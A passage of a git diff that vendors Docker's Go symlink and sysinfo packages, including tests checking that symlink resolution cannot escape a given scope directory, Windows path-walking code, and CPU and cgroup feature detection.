+	rewrite, err := FollowSymlinkInScope(filepath.Join(tmpdir, path), filepath.Join(tmpdir, scope))
+	if err != nil {
+		return err
+	}
+	expected, err = filepath.Abs(filepath.Join(tmpdir, expected))
+	if err != nil {
+		return err
+	}
+	if expected != rewrite {
+		return fmt.Errorf("Expected %q got %q", expected, rewrite)
+	}
+	return nil
+}
+
+func TestFollowSymlinkAbsolute(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkAbsolute")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/a/d/c/data", "testdata/b/c/data", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkRelativePath(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/i", target: "a"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/i", "testdata/fs/a", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkSkipSymlinksOutsideScope(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSkipSymlinksOutsideScope")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "linkdir", target: "realdir"},
+		{path: "linkdir/foo/bar"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "linkdir/foo/bar", "linkdir/foo/bar", "linkdir/foo"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkInvalidScopePathPair(t *testing.T) {
+	if _, err := FollowSymlinkInScope("toto", "testdata"); err == nil {
+		t.Fatal("expected an error")
+	}
+}
+
+func TestFollowSymlinkLastLink(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkLastLink")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/a/d", "testdata/b", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkRelativeLinkChangeScope(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChangeScope")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/e", target: "../b"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/a/e/c/data", "testdata/fs/b/c/data", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+	// avoid letting allowing symlink e lead us to ../b
+	// normalize to the "testdata/fs/a"
+	if err := testSymlink(tmpdir, "testdata/fs/a/e", "testdata/fs/a/b", "testdata/fs/a"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkDeepRelativeLinkChangeScope(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDeepRelativeLinkChangeScope")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/f", target: "../../../../test"}}); err != nil {
+		t.Fatal(err)
+	}
+	// avoid letting symlink f lead us out of the "testdata" scope
+	// we don't normalize because symlink f is in scope and there is no
+	// information leak
+	if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/test", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+	// avoid letting symlink f lead us out of the "testdata/fs" scope
+	// we don't normalize because symlink f is in scope and there is no
+	// information leak
+	if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/fs/test", "testdata/fs"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkRelativeLinkChain(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChain")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	// avoid letting symlink g (pointed at by symlink h) take out of scope
+	// TODO: we should probably normalize to scope here because ../[....]/root
+	// is out of scope and we leak information
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "testdata/fs/b/h", target: "../g"},
+		{path: "testdata/fs/g", target: "../../../../../../../../../../../../root"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/b/h", "testdata/root", "testdata"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkBreakoutPath(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutPath")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	// avoid letting symlink -> ../directory/file escape from scope
+	// normalize to "testdata/fs/j"
+	if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/j/k", target: "../i/a"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "testdata/fs/j/k", "testdata/fs/j/i/a", "testdata/fs/j"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkToRoot(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkToRoot")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	// make sure we don't allow escaping to /
+	// normalize to dir
+	if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "foo", "", ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkSlashDotdot(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSlashDotdot")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	tmpdir = filepath.Join(tmpdir, "dir", "subdir")
+
+	// make sure we don't allow escaping to /
+	// normalize to dir
+	if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/../../"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "foo", "", ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkDotdot(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDotdot")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	tmpdir = filepath.Join(tmpdir, "dir", "subdir")
+
+	// make sure we stay in scope without leaking information
+	// this also checks for escaping to /
+	// normalize to dir
+	if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "../../"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "foo", "", ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkRelativePath2(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{{path: "bar/foo", target: "baz/target"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "bar/foo", "bar/baz/target", ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkScopeLink(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkScopeLink")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "root2"},
+		{path: "root", target: "root2"},
+		{path: "root2/foo", target: "../bar"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/foo", "root/bar", "root"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkRootScope(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRootScope")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	expected, err := filepath.EvalSymlinks(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	rewrite, err := FollowSymlinkInScope(tmpdir, "/")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if rewrite != expected {
+		t.Fatalf("expected %q got %q", expected, rewrite)
+	}
+}
+
+func TestFollowSymlinkEmpty(t *testing.T) {
+	res, err := FollowSymlinkInScope("", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	wd, err := os.Getwd()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if res != wd {
+		t.Fatalf("expected %q got %q", wd, res)
+	}
+}
+
+func TestFollowSymlinkCircular(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkCircular")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{{path: "root/foo", target: "foo"}}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil {
+		t.Fatal("expected an error for foo -> foo")
+	}
+
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "root/bar", target: "baz"},
+		{path: "root/baz", target: "../bak"},
+		{path: "root/bak", target: "/bar"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil {
+		t.Fatal("expected an error for bar -> baz -> bak -> bar")
+	}
+}
+
+func TestFollowSymlinkComplexChainWithTargetPathsContainingLinks(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkComplexChainWithTargetPathsContainingLinks")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "root2"},
+		{path: "root", target: "root2"},
+		{path: "root/a", target: "r/s"},
+		{path: "root/r", target: "../root/t"},
+		{path: "root/root/t/s/b", target: "/../u"},
+		{path: "root/u/c", target: "."},
+		{path: "root/u/x/y", target: "../v"},
+		{path: "root/u/v", target: "/../w"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/a/b/c/x/y/z", "root/w/z", "root"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkBreakoutNonExistent(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutNonExistent")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "root/slash", target: "/"},
+		{path: "root/sym", target: "/idontexist/../slash"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/sym/file", "root/file", "root"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFollowSymlinkNoLexicalCleaning(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkNoLexicalCleaning")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	if err := makeFs(tmpdir, []dirOrLink{
+		{path: "root/sym", target: "/foo/bar"},
+		{path: "root/hello", target: "/sym/../baz"},
+	}); err != nil {
+		t.Fatal(err)
+	}
+	if err := testSymlink(tmpdir, "root/hello", "root/foo/baz", "root"); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
new file mode 100644
index 0000000000..241e531f9d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
@@ -0,0 +1,169 @@
+package symlink
+
+import (
+	"bytes"
+	"errors"
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	"github.com/docker/docker/pkg/longpath"
+)
+
+func toShort(path string) (string, error) {
+	p, err := syscall.UTF16FromString(path)
+	if err != nil {
+		return "", err
+	}
+	b := p // GetShortPathName says we can reuse buffer
+	n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b)))
+	if err != nil {
+		return "", err
+	}
+	if n > uint32(len(b)) {
+		b = make([]uint16, n)
+		if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil {
+			return "", err
+		}
+	}
+	return syscall.UTF16ToString(b), nil
+}
+
+func toLong(path string) (string, error) {
+	p, err := syscall.UTF16FromString(path)
+	if err != nil {
+		return "", err
+	}
+	b := p // GetLongPathName says we can reuse buffer
+	n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b)))
+	if err != nil {
+		return "", err
+	}
+	if n > uint32(len(b)) {
+		b = make([]uint16, n)
+		n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b)))
+		if err != nil {
+			return "", err
+		}
+	}
+	b = b[:n]
+	return syscall.UTF16ToString(b), nil
+}
+
+func evalSymlinks(path string) (string, error) {
+	path, err := walkSymlinks(path)
+	if err != nil {
+		return "", err
+	}
+
+	p, err := toShort(path)
+	if err != nil {
+		return "", err
+	}
+	p, err = toLong(p)
+	if err != nil {
+		return "", err
+	}
+	// syscall.GetLongPathName does not change the case of the drive letter,
+	// but the result of EvalSymlinks must be unique, so we have
+	// EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`).
+	// Make drive letter upper case.
+	if len(p) >= 2 && p[1] == ':' && 'a' <= p[0] && p[0] <= 'z' {
+		p = string(p[0]+'A'-'a') + p[1:]
+	} else if len(p) >= 6 && p[5] == ':' && 'a' <= p[4] && p[4] <= 'z' {
+		p = p[:3] + string(p[4]+'A'-'a') + p[5:]
+	}
+	return filepath.Clean(p), nil
+}
+
+const utf8RuneSelf = 0x80
+
+func walkSymlinks(path string) (string, error) {
+	const maxIter = 255
+	originalPath := path
+	// consume path by taking each frontmost path element,
+	// expanding it if it's a symlink, and appending it to b
+	var b bytes.Buffer
+	for n := 0; path != ""; n++ {
+		if n > maxIter {
+			return "", errors.New("EvalSymlinks: too many links in " + originalPath)
+		}
+
+		// A path beginning with `\\?\` represents the root, so automatically
+		// skip that part and begin processing the next segment.
+		if strings.HasPrefix(path, longpath.Prefix) {
+			b.WriteString(longpath.Prefix)
+			path = path[4:]
+			continue
+		}
+
+		// find next path component, p
+		var i = -1
+		for j, c := range path {
+			if c < utf8RuneSelf && os.IsPathSeparator(uint8(c)) {
+				i = j
+				break
+			}
+		}
+		var p string
+		if i == -1 {
+			p, path = path, ""
+		} else {
+			p, path = path[:i], path[i+1:]
+		}
+
+		if p == "" {
+			if b.Len() == 0 {
+				// must be absolute path
+				b.WriteRune(filepath.Separator)
+			}
+			continue
+		}
+
+		// If this is the first segment after the long path prefix, accept the
+		// current segment as a volume root or UNC share and move on to the next.
+		if b.String() == longpath.Prefix {
+			b.WriteString(p)
+			b.WriteRune(filepath.Separator)
+			continue
+		}
+
+		fi, err := os.Lstat(b.String() + p)
+		if err != nil {
+			return "", err
+		}
+		if fi.Mode()&os.ModeSymlink == 0 {
+			b.WriteString(p)
+			if path != "" || (b.Len() == 2 && len(p) == 2 && p[1] == ':') {
+				b.WriteRune(filepath.Separator)
+			}
+			continue
+		}
+
+		// it's a symlink, put it at the front of path
+		dest, err := os.Readlink(b.String() + p)
+		if err != nil {
+			return "", err
+		}
+		if filepath.IsAbs(dest) || os.IsPathSeparator(dest[0]) {
+			b.Reset()
+		}
+		path = dest + string(filepath.Separator) + path
+	}
+	return filepath.Clean(b.String()), nil
+}
+
+func isDriveOrRoot(p string) bool {
+	if p == string(filepath.Separator) {
+		return true
+	}
+
+	length := len(p)
+	if length >= 2 {
+		if p[length-1] == ':' && (('a' <= p[length-2] && p[length-2] <= 'z') || ('A' <= p[length-2] && p[length-2] <= 'Z')) {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/README.md b/vendor/github.com/docker/docker/pkg/sysinfo/README.md
new file mode 100644
index 0000000000..c1530cef0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/README.md
@@ -0,0 +1 @@
+SysInfo stores information about which features a kernel supports.
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
new file mode 100644
index 0000000000..aeb1a3a804
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
@@ -0,0 +1,12 @@
+// +build !linux,!windows
+
+package sysinfo
+
+import (
+	"runtime"
+)
+
+// NumCPU returns the number of CPUs
+func NumCPU() int {
+	return runtime.NumCPU()
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
new file mode 100644
index 0000000000..5eacd35121
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
@@ -0,0 +1,43 @@
+// +build linux
+
+package sysinfo
+
+import (
+	"runtime"
+	"syscall"
+	"unsafe"
+)
+
+// numCPU queries the system for the count of threads available
+// for use to this process.
+//
+// Issues two syscalls.
+// Returns 0 on errors. Use |runtime.NumCPU| in that case.
+func numCPU() int {
+	// Gets the affinity mask for a process: The very one invoking this function.
+	pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0)
+
+	var mask [1024 / 64]uintptr
+	_, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0])))
+	if err != 0 {
+		return 0
+	}
+
+	// For every available thread a bit is set in the mask.
+	ncpu := 0
+	for _, e := range mask {
+		if e == 0 {
+			continue
+		}
+		ncpu += int(popcnt(uint64(e)))
+	}
+	return ncpu
+}
+
+// NumCPU returns the number of CPUs which are currently online
+func NumCPU() int {
+	if ncpu := numCPU(); ncpu > 0 {
+		return ncpu
+	}
+	return runtime.NumCPU()
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
new file mode 100644
index 0000000000..1d89dd5503
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
@@ -0,0 +1,37 @@
+// +build windows
+
+package sysinfo
+
+import (
+	"runtime"
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+var (
+	kernel32               = windows.NewLazySystemDLL("kernel32.dll")
+	getCurrentProcess      = kernel32.NewProc("GetCurrentProcess")
+	getProcessAffinityMask = kernel32.NewProc("GetProcessAffinityMask")
+)
+
+func numCPU() int {
+	// Gets the affinity mask for a process
+	var mask, sysmask uintptr
+	currentProcess, _, _ := getCurrentProcess.Call()
+	ret, _, _ := getProcessAffinityMask.Call(currentProcess, uintptr(unsafe.Pointer(&mask)), uintptr(unsafe.Pointer(&sysmask)))
+	if ret == 0 {
+		return 0
+	}
+	// For every available thread a bit is set in the mask.
+	ncpu := int(popcnt(uint64(mask)))
+	return ncpu
+}
+
+// NumCPU returns the number of CPUs which are currently online
+func NumCPU() int {
+	if ncpu := numCPU(); ncpu > 0 {
+		return ncpu
+	}
+	return runtime.NumCPU()
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
new file mode 100644
index 0000000000..f046de4b16
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
@@ -0,0 +1,144 @@
+package sysinfo
+
+import "github.com/docker/docker/pkg/parsers"
+
+// SysInfo stores information about which features a kernel supports.
+// TODO Windows: Factor out platform specific capabilities.
+type SysInfo struct {
+	// Whether the kernel supports AppArmor or not
+	AppArmor bool
+	// Whether the kernel supports Seccomp or not
+	Seccomp bool
+
+	cgroupMemInfo
+	cgroupCPUInfo
+	cgroupBlkioInfo
+	cgroupCpusetInfo
+	cgroupPids
+
+	// Whether IPv4 forwarding is supported or not, if this was disabled, networking will not work
+	IPv4ForwardingDisabled bool
+
+	// Whether bridge-nf-call-iptables is supported or not
+	BridgeNFCallIPTablesDisabled bool
+
+	// Whether bridge-nf-call-ip6tables is supported or not
+	BridgeNFCallIP6TablesDisabled bool
+
+	// Whether the cgroup has the mountpoint of "devices" or not
+	CgroupDevicesEnabled bool
+}
+
+type cgroupMemInfo struct {
+	// Whether memory limit is supported or not
+	MemoryLimit bool
+
+	// Whether swap limit is supported or not
+	SwapLimit bool
+
+	// Whether soft limit is supported or not
+	MemoryReservation bool
+
+	// Whether OOM killer disable is supported or not
+	OomKillDisable bool
+
+	// Whether memory swappiness is supported or not
+	MemorySwappiness bool
+
+	// Whether kernel memory limit is supported or not
+	KernelMemory bool
+}
+
+type cgroupCPUInfo struct {
+	// Whether CPU shares is supported or not
+	CPUShares bool
+
+	// Whether CPU CFS(Completely Fair Scheduler) period is supported or not
+	CPUCfsPeriod bool
+
+	// Whether CPU CFS(Completely Fair Scheduler) quota is supported or not
+	CPUCfsQuota bool
+
+	// Whether CPU real-time period is supported or not
+	CPURealtimePeriod bool
+
+	// Whether CPU real-time runtime is supported or not
+	CPURealtimeRuntime bool
+}
+
+type cgroupBlkioInfo struct {
+	// Whether Block IO weight is supported or not
+	BlkioWeight bool
+
+	// Whether Block IO weight_device is supported or not
+	BlkioWeightDevice bool
+
+	// Whether Block IO read limit in bytes per second is supported or not
+	BlkioReadBpsDevice bool
+
+	// Whether Block IO write limit in bytes per second is supported or not
+	BlkioWriteBpsDevice bool
+
+	// Whether Block IO read limit in IO per second is supported or not
+	BlkioReadIOpsDevice bool
+
+	// Whether Block IO write limit in IO per second is supported or not
+	BlkioWriteIOpsDevice bool
+}
+
+type cgroupCpusetInfo struct {
+	// Whether Cpuset is supported or not
+	Cpuset bool
+
+	// Available Cpuset's cpus
+	Cpus string
+
+	// Available Cpuset's memory nodes
+	Mems string
+}
+
+type cgroupPids struct {
+	// Whether Pids Limit is supported or not
+	PidsLimit bool
+}
+
+// IsCpusetCpusAvailable returns `true` if the provided string set is contained
+// in cgroup's cpuset.cpus set, `false` otherwise.
+// If error is not nil a parsing error occurred.
+func (c cgroupCpusetInfo) IsCpusetCpusAvailable(provided string) (bool, error) {
+	return isCpusetListAvailable(provided, c.Cpus)
+}
+
+// IsCpusetMemsAvailable returns `true` if the provided string set is contained
+// in cgroup's cpuset.mems set, `false` otherwise.
+// If error is not nil a parsing error occurred.
+func (c cgroupCpusetInfo) IsCpusetMemsAvailable(provided string) (bool, error) {
+	return isCpusetListAvailable(provided, c.Mems)
+}
+
+func isCpusetListAvailable(provided, available string) (bool, error) {
+	parsedProvided, err := parsers.ParseUintList(provided)
+	if err != nil {
+		return false, err
+	}
+	parsedAvailable, err := parsers.ParseUintList(available)
+	if err != nil {
+		return false, err
+	}
+	for k := range parsedProvided {
+		if !parsedAvailable[k] {
+			return false, nil
+		}
+	}
+	return true, nil
+}
+
+// Returns bit count of 1, used by NumCPU
+func popcnt(x uint64) (n byte) {
+	x -= (x >> 1) & 0x5555555555555555
+	x = (x>>2)&0x3333333333333333 + x&0x3333333333333333
+	x += x >> 4
+	x &= 0x0f0f0f0f0f0f0f0f
+	x *= 0x0101010101010101
+	return byte(x >> 56)
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
new file mode 100644
index 0000000000..7ad84a8309
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
@@ -0,0 +1,259 @@
+package sysinfo
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"strings"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/opencontainers/runc/libcontainer/cgroups"
+)
+
+const (
+	// SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER.
+	SeccompModeFilter = uintptr(2)
+)
+
+func findCgroupMountpoints() (map[string]string, error) {
+	cgMounts, err := cgroups.GetCgroupMounts(false)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to parse cgroup information: %v", err)
+	}
+	mps := make(map[string]string)
+	for _, m := range cgMounts {
+		for _, ss := range m.Subsystems {
+			mps[ss] = m.Mountpoint
+		}
+	}
+	return mps, nil
+}
+
+// New returns a new SysInfo, using the filesystem to detect which features
+// the kernel supports. If `quiet` is `false` warnings are printed in logs
+// whenever an error occurs or misconfigurations are present.
+func New(quiet bool) *SysInfo {
+	sysInfo := &SysInfo{}
+	cgMounts, err := findCgroupMountpoints()
+	if err != nil {
+		logrus.Warnf("Failed to parse cgroup information: %v", err)
+	} else {
+		sysInfo.cgroupMemInfo = checkCgroupMem(cgMounts, quiet)
+		sysInfo.cgroupCPUInfo = checkCgroupCPU(cgMounts, quiet)
+		sysInfo.cgroupBlkioInfo = checkCgroupBlkioInfo(cgMounts, quiet)
+		sysInfo.cgroupCpusetInfo = checkCgroupCpusetInfo(cgMounts, quiet)
+		sysInfo.cgroupPids = checkCgroupPids(quiet)
+	}
+
+	_, ok := cgMounts["devices"]
+	sysInfo.CgroupDevicesEnabled = ok
+
+	sysInfo.IPv4ForwardingDisabled = !readProcBool("/proc/sys/net/ipv4/ip_forward")
+	sysInfo.BridgeNFCallIPTablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-iptables")
+	sysInfo.BridgeNFCallIP6TablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-ip6tables")
+
+	// Check if AppArmor is supported.
+	if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) {
+		sysInfo.AppArmor = true
+	}
+
+	// Check if Seccomp is supported, via CONFIG_SECCOMP.
+	if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL {
+		// Make sure the kernel has CONFIG_SECCOMP_FILTER.
+		if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL {
+			sysInfo.Seccomp = true
+		}
+	}
+
+	return sysInfo
+}
+
+// checkCgroupMem reads the memory information from the memory cgroup mount point.
+func checkCgroupMem(cgMounts map[string]string, quiet bool) cgroupMemInfo {
+	mountPoint, ok := cgMounts["memory"]
+	if !ok {
+		if !quiet {
+			logrus.Warn("Your kernel does not support cgroup memory limit")
+		}
+		return cgroupMemInfo{}
+	}
+
+	swapLimit := cgroupEnabled(mountPoint, "memory.memsw.limit_in_bytes")
+	if !quiet && !swapLimit {
+		logrus.Warn("Your kernel does not support swap memory limit")
+	}
+	memoryReservation := cgroupEnabled(mountPoint, "memory.soft_limit_in_bytes")
+	if !quiet && !memoryReservation {
+		logrus.Warn("Your kernel does not support memory reservation")
+	}
+	oomKillDisable := cgroupEnabled(mountPoint, "memory.oom_control")
+	if !quiet && !oomKillDisable {
+		logrus.Warn("Your kernel does not support oom control")
+	}
+	memorySwappiness := cgroupEnabled(mountPoint, "memory.swappiness")
+	if !quiet && !memorySwappiness {
+		logrus.Warn("Your kernel does not support memory swappiness")
+	}
+	kernelMemory := cgroupEnabled(mountPoint, "memory.kmem.limit_in_bytes")
+	if !quiet && !kernelMemory {
+		logrus.Warn("Your kernel does not support kernel memory limit")
+	}
+
+	return cgroupMemInfo{
+		MemoryLimit:       true,
+		SwapLimit:         swapLimit,
+		MemoryReservation: memoryReservation,
+		OomKillDisable:    oomKillDisable,
+		MemorySwappiness:  memorySwappiness,
+		KernelMemory:      kernelMemory,
+	}
+}
+
+// checkCgroupCPU reads the cpu information from the cpu cgroup mount point.
+func checkCgroupCPU(cgMounts map[string]string, quiet bool) cgroupCPUInfo {
+	mountPoint, ok := cgMounts["cpu"]
+	if !ok {
+		if !quiet {
+			logrus.Warn("Unable to find cpu cgroup in mounts")
+		}
+		return cgroupCPUInfo{}
+	}
+
+	cpuShares := cgroupEnabled(mountPoint, "cpu.shares")
+	if !quiet && !cpuShares {
+		logrus.Warn("Your kernel does not support cgroup cpu shares")
+	}
+
+	cpuCfsPeriod := cgroupEnabled(mountPoint, "cpu.cfs_period_us")
+	if !quiet && !cpuCfsPeriod {
+		logrus.Warn("Your kernel does not support cgroup cfs period")
+	}
+
+	cpuCfsQuota := cgroupEnabled(mountPoint, "cpu.cfs_quota_us")
+	if !quiet && !cpuCfsQuota {
+		logrus.Warn("Your kernel does not support cgroup cfs quotas")
+	}
+
+	cpuRealtimePeriod := cgroupEnabled(mountPoint, "cpu.rt_period_us")
+	if !quiet && !cpuRealtimePeriod {
+		logrus.Warn("Your kernel does not support cgroup rt period")
+	}
+
+	cpuRealtimeRuntime := cgroupEnabled(mountPoint, "cpu.rt_runtime_us")
+	if !quiet && !cpuRealtimeRuntime {
+		logrus.Warn("Your kernel does not support cgroup rt runtime")
+	}
+
+	return cgroupCPUInfo{
+		CPUShares:          cpuShares,
+		CPUCfsPeriod:       cpuCfsPeriod,
+		CPUCfsQuota:        cpuCfsQuota,
+		CPURealtimePeriod:  cpuRealtimePeriod,
+		CPURealtimeRuntime: cpuRealtimeRuntime,
+	}
+}
+
+// checkCgroupBlkioInfo reads the blkio information from the blkio cgroup mount point.
